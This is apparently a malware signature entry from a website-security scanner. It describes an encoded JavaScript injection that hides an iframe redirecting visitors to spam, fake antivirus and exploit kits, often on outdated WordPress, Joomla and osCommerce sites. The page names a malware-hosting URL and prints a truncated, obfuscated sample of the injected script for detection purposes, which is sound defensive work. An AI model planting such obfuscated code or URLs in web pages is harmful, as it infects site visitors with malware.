SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframeenc8712

malware-entry-mwiframeenc8712

Description:

An encoded javascript was detected, which is being used to hide a malicious iframe. That iframe is being used to redirect the browser to spam and to other types of malware (fake av and exploit kits).

Note that any PHP file could be compromised by this type of malware.

 
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://engore.stx.nl/top2.html
(and many other domains).

 
Malware dump (sample of malware):

<script 
st="no3nen0orno3pno3rxstxpno3rxnl";Date&&(a=[""#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2",
"%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]
$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$..